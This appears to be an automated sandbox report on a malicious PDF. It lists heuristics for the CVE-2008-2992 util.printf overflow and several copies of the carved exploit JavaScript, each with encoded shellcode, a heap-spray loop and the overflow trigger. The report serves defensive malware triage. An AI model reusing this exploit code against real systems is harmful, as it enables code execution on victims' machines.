MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The presence of an unescape() call and a suspicious extracted artifact named 'javascript_obj0013_001.js' suggests obfuscated code. The JavaScript is likely designed to download and execute a second-stage payload, a common technique for initial access. The confidence is moderate due to the lack of specific details on the payload's destination or execution method.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
stream zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" + "%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" + -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x390 | 2737 bytes |
SHA-256: 6d2b1466282c843d171b24cf2b948c33a7dc3f5308ead69e657f82ce85186080 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
|
|||
javascript_obj0013_002.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3B2 | 3334 bytes |
SHA-256: c900c989ba38cfddb7d7282920604773f2384117bbfc0f52194fe8a6b550bf21 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x390 | 2008 bytes |
SHA-256: 6d15c264fb06e413d0707ad8968ae632ea3e8b086ee932f3a956fcb90ef7c237 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3B2 | 2605 bytes |
SHA-256: 0467e7075159ecdbe5458d68e5491a741ee035011a7c2581cdfccf51b43649a2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_002.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0xF | 4634 bytes |
SHA-256: 01848684b8a804eb035b52928862a87423f23b913dbb6db0b64e0ec38ecf9059 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0xF | 6092 bytes |
SHA-256: 20bc4b581632348d07cb9d5a6bd4c2842369f305ed3888e6097921fc2445a4d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
